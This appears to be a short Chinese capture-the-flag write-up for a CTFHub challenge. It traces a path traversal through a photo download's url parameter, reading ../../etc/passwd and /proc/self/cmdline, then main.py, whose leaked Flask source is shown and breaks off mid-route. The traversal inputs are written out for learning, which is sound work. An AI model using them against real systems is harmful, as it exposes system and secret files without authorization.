回顾
在CTFHub平台
可进行复现
🍺一进门就是个照片下载
🍺重点却是get请求存在URL参数
🍺抓包测试发现url?=../../etc/passwd
发现文件
🍺通过查看../../proc/self/cmdline
查看当前运行的进程
🍺然后查看当前运行的进程main.py
🍺这里暴露了flask源代码
from flask import Flask, Response, render_template, request
import os
import urllib
app = Flask(__name__)
SECRET_FILE = "/tmp/secret.txt"
f = open(SECRET_FILE, 'r')
SECRET_KEY = f.read().strip()
os.remove(SECRET_FILE)
@app.route('/')
def index():
return render_template('search.html')
@app.route